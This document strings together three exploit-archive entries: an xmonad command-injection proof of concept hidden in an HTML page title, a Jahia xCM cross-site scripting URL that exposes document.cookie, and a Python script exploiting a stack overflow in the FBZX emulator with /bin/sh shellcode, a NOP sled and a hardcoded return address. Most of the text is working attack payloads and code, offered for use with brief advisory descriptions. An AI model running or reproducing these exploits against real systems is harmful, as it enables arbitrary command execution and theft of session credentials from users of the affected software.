source: https://www.securityfocus.com/bid/61491/info XMonad.Hooks.DynamicLog module for xmonad is prone to multiple remote command-injection vulnerabilities. Successful exploits will result in the execution of arbitrary commands in the context of the affected applications. This may aid in further attacks. <html> <head> <title><action=xclock>An innocent title</action></title> </head> <body> <h1>Good bye, cruel world</h1> </body> </html>

source: https://www.securityfocus.com/bid/61571/info Jahia xCM is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Jahia xCM 6.6.1.0 r43343 is vulnerable; other versions may also be affected. http://www.example.com/engines/manager.jsp?conf=repositoryexplorer&site=%3C/script%3E%3Cscript%3Ealert%28docu ment.cookie%29;%3C/script%3E

# Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com> # Program: fbzx - ZX Spectrum Emulator for X # Tested on: GNU/Linux - Kali Linux 2.0 x86 # # Description: FBZX v2.10 and prior is prone to a stack-based buffer overflow # vulnerability because the application fails to perform adequate # boundary-checks on user-supplied input. # # An attacker could exploit this issue to execute arbitrary code in the # context of the application. Failed exploit attempts will result in a # denial-of-service condition. # # Vendor homepage: *http://www.rastersoft.com/ <http://www.rastersoft.com/>* # Kali Linux 2.0 package: http://repo.kali.org/kali/pool/contrib/f/fbzx/ # MD5: 0fc1d2e9c374c1156b2b02186a9f8980 import os,subprocess def run(): try: print "# FBZX v2.10 Stack-Based Overflow by Juan Sacco" print "# It's Fuzzing time on unusable exploits" print "# This exploit is for educational purposes only" # Basic structure: JUNK + SHELLCODE + NOPS + EIP junk = "\x41"*8 shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" nops = "\x90"*5010 eip = "\x10\xd3\xff\xbf" subprocess.call(["fbzx",' ', junk + shellcode + nops + eip]) except OSError as e: if e.errno == os.errno.ENOENT: print "FBZX not found!" else: print "Error executing exploit" raise def howtousage(): print "Sorry, something went wrong" sys.exit(-1) if __name__ == '__main__': try: print "Exploit FBZX 2.10 Local Overflow Exploit" print "Author: Juan Sacco" except IndexError: howtousage() run()